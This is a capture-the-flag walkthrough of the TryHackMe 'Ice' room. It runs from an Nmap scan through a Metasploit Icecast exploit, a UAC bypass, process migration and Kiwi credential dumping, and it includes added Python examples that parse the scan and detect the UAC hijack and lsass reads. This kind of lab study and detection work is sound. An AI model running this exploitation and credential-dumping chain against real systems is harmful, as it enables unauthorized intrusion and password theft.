THM — ICE

Yikai
5 min read · Nov 18, 2020


Nmap scan

kali@kali:~$ nmap -T4 -sC -sV 10.10.218.181
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-18 02:00 EST
Nmap scan report for 10.10.218.181
Host is up (0.35s latency).
Not shown: 988 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open tcpwrapped
|_ssl-date: 2020-11-18T07:02:03+00:00; +1s from scanner time.
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
8000/tcp open http Icecast streaming media server
|_http-title: Site doesn't have a title (text/html).
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
49159/tcp open msrpc Microsoft Windows RPC
49160/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DARK-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1h30m01s, deviation: 3h00m01s, median: 0s
|_nbstat: NetBIOS name: DARK-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02:0f:04:dc:0d:53 (unknown)
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: Dark-PC
| NetBIOS computer name: DARK-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2020-11-18T01:01:50-06:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-11-18T07:01:52
|_ start_date: 2020-11-18T06:57:46
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 165.41 seconds
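Before moving on to exploitation, it is worth pulling the defender-relevant facts out of that scan. The Python below is an added example, not code from the original write-up: it parses an abridged copy of the Nmap output above (same lines, same collapsed spacing) into per-port records plus the host-script block, and then applies a small set of hardening rules. The rules themselves (which patterns count as a finding, the wording of each recommendation) are this example's own choices; the one external fact they rely on is that Windows 7 left extended support on 2020-01-14.

```python
import re
from dataclasses import dataclass, field

# Abridged copy of the Nmap output shown above (columns collapsed to single
# spaces, as on the page).  Only the lines the findings below rely on are kept.
NMAP_OUTPUT = """\
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open tcpwrapped
|_ssl-date: 2020-11-18T07:02:03+00:00; +1s from scanner time.
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
8000/tcp open http Icecast streaming media server
|_http-title: Site doesn't have a title (text/html).
49152/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DARK-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| smb-security-mode:
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
"""

# One port line: "<port>/<proto> <state> <service> [<version ...>]"
PORT_RE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"(?:\s+(?P<version>.*))?$"
)


@dataclass
class Port:
    number: int
    proto: str
    state: str
    service: str
    version: str
    scripts: list = field(default_factory=list)  # NSE output attached to this port


def parse_nmap(text):
    """Return (ports, host_script_lines) from Nmap normal-format output."""
    ports, host_scripts = [], []
    in_host_scripts = False
    for raw in text.splitlines():
        line = raw.rstrip()
        if line.startswith("Host script results:"):
            in_host_scripts = True
            continue
        m = PORT_RE.match(line)
        if m:
            ports.append(Port(int(m["port"]), m["proto"], m["state"], m["service"],
                              (m["version"] or "").strip()))
        elif line.startswith("|") and (in_host_scripts or ports):
            # Strip the "| " / "|_ " tree prefix and attach to the right owner.
            entry = line.lstrip("|_ ")
            (host_scripts if in_host_scripts else ports[-1].scripts).append(entry)
    return ports, host_scripts


def findings(ports, host_scripts):
    """Map the scan to hardening findings.  The rules are this example's own."""
    out = []
    open_ports = {p.number: p for p in ports if p.state == "open"}
    host_text = "\n".join(host_scripts)
    if (re.search(r"message_signing:\s*disabled", host_text)
            or "Message signing enabled but not required" in host_text):
        out.append(("smb-signing", "SMB signing not required: enforce signing to stop NTLM relay."))
    if "Windows 7" in host_text or any("Windows 7" in p.version for p in ports):
        out.append(("eol-os", "Windows 7 left extended support on 2020-01-14: no more patches."))
    if 8000 in open_ports and "Icecast" in open_ports[8000].version:
        out.append(("icecast", "Icecast reachable on 8000/tcp: limit exposure and keep it patched."))
    if 3389 in open_ports:
        out.append(("rdp", "RDP reachable from the scanner: restrict to VPN or jump host."))
    if 445 in open_ports:
        out.append(("smb", "SMB reachable from the scanner: block at the host firewall."))
    return out


if __name__ == "__main__":
    ports, host = parse_nmap(NMAP_OUTPUT)
    for p in ports:
        print(f"{p.number}/{p.proto} {p.state} {p.service} {p.version}")
    for ident, msg in findings(ports, host):
        print(f"[{ident}] {msg}")
```

Run as a script it lists the seven parsed ports and five findings; the SMB-signing and end-of-life findings are the two that would matter most to whoever owns this host, since every later step in the write-up depends on an unpatched service and a credential-bearing process on an unsupported OS.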

Let’s open Metasploit and search for an exploit for Icecast.

Use the options command and set the required fields.

The output shows that we need to set RHOST and LHOST (LHOST is the THM VPN IP).

Let’s run the exploit, and we have a meterpreter shell.

We can look at processes by using the command: ps

From above we can see that the user Dark is running the icecast process.

We can also run $ sysinfo to find out the build of the system.

We can run the command: $ run post/multi/recon/local_exploit_suggester to find exploits for priv esc.

Let’s try the first exploit: $ exploit/windows/local/bypassuac_eventvwr

First, we have to background the current session. Double-check your session number.

Run the full path of the exploit: $ exploit/windows/local/bypassuac_eventvwr

Set the correct SESSION and LHOST.

Once it runs, we should have a second session.

Using the $ getprivs command we can check our privileges.

To compare and confirm that we have indeed extended our privileges, let’s background this current session.

Go into the previous session and use the $ getprivs command again.

We can see below that we have only a few privileges compared with the new session.

Now if we use the ps command again in the newer session, we can see processes being run by NT AUTHORITY\SYSTEM.

Next, we want to interact with the lsass service. To do this, we need to migrate into a process that has permission to do so, meaning one with the same privileges and architecture. One such process is spoolsv.exe.

Migrate to this process $ migrate 1256

Now with the command: $ getuid

We can see that we are currently running as NT AUTHORITY\SYSTEM.

Next, let’s load kiwi: meterpreter > load kiwi

Using help we can see the new section for kiwi.

With kiwi we can dump passwords. Let’s use the command: creds_all

Kiwi can pull the password from memory even though the user Dark is not logged in, since a scheduled task runs icecast as Dark.

Another thing to note is that kiwi can also create a golden ticket, which would let us authenticate as any user on the domain. Read more about it here.
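Seen from the host side, two steps of this chain leave very specific traces: bypassuac_eventvwr works by writing a command under the current user's mscfile open handler so that the auto-elevated Event Viewer launches it, and creds_all running inside the migrated spoolsv.exe means the print spooler opens lsass.exe for memory reading, which it never does on its own. The Python below is an added example, not part of the write-up, showing the two detection rules over hand-constructed Sysmon-style records (event ID 13 for a registry value set and ID 10 for process access are Sysmon's real IDs and field names; the paths, SIDs and PIDs are made up, except spoolsv.exe PID 1256 which is taken from the write-up). The allowlist of processes permitted to read lsass is an assumption that has to be tuned per environment.

```python
import re

# Sysmon event IDs used below (real Sysmon values; the records are constructed).
REGISTRY_VALUE_SET = 13
PROCESS_ACCESS = 10

# bypassuac_eventvwr hijacks the per-user handler for .msc files so that the
# auto-elevated Event Viewer launches an attacker-chosen command instead of mmc.
MSCFILE_HANDLER_RE = re.compile(
    r"\\Software\\Classes\\mscfile\\shell\\open\\command", re.IGNORECASE
)

# Assumed allowlist of images that legitimately open lsass.exe with read access.
# Tune per environment; svchost.exe in particular is a coarse entry.
LSASS_READERS = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\services.exe",
    r"c:\windows\system32\svchost.exe",
    r"c:\windows\system32\wmiprvse.exe",
}
PROCESS_VM_READ = 0x0010  # access bit required to read another process's memory

# Constructed Sysmon-style records.  Paths, SIDs and PIDs are made up, except
# spoolsv.exe PID 1256, which is the process the write-up migrates into.
EVENTS = [
    {"EventID": 13, "Image": r"C:\Icecast\Icecast2.exe",
     "TargetObject": r"HKU\S-1-5-21-0-0-0-1000\Software\Classes\mscfile\shell\open\command\(Default)"},
    {"EventID": 13, "Image": r"C:\Windows\System32\svchost.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{x}\DhcpIPAddress"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\csrss.exe", "SourceProcessId": "372",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1fffff"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\spoolsv.exe", "SourceProcessId": "1256",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\taskmgr.exe", "SourceProcessId": "2044",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
]


def is_mscfile_hijack(ev):
    """Registry write to the mscfile open handler under any user hive."""
    return (ev["EventID"] == REGISTRY_VALUE_SET
            and bool(MSCFILE_HANDLER_RE.search(ev["TargetObject"])))


def is_suspicious_lsass_read(ev):
    """lsass.exe opened with VM_READ by an image outside the allowlist."""
    if ev["EventID"] != PROCESS_ACCESS:
        return False
    if not ev["TargetImage"].lower().endswith(r"\lsass.exe"):
        return False
    if not (int(ev["GrantedAccess"], 16) & PROCESS_VM_READ):
        return False  # e.g. 0x1000 (QUERY_LIMITED_INFORMATION) cannot read memory
    return ev["SourceImage"].lower() not in LSASS_READERS


def triage(events):
    """Return (rule, image, detail) tuples for every event that matches a rule."""
    alerts = []
    for ev in events:
        if is_mscfile_hijack(ev):
            alerts.append(("uac-bypass-eventvwr", ev["Image"], ev["TargetObject"]))
        elif is_suspicious_lsass_read(ev):
            alerts.append(("lsass-read", ev["SourceImage"], ev["GrantedAccess"]))
    return alerts


if __name__ == "__main__":
    for rule, image, detail in triage(EVENTS):
        print(f"[{rule}] {image} -> {detail}")
```

Two caveats for anyone wiring this up for real: Sysmon only emits event 10 for lsass.exe if its configuration includes a ProcessAccess rule for that target, and the registry rule should also watch the machine hive, since the same handler path exists under HKLM and a change there affects every user.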


Yikai

Started my journey in cybersecurity on September 2020. This blog is used mainly to record my learning journey.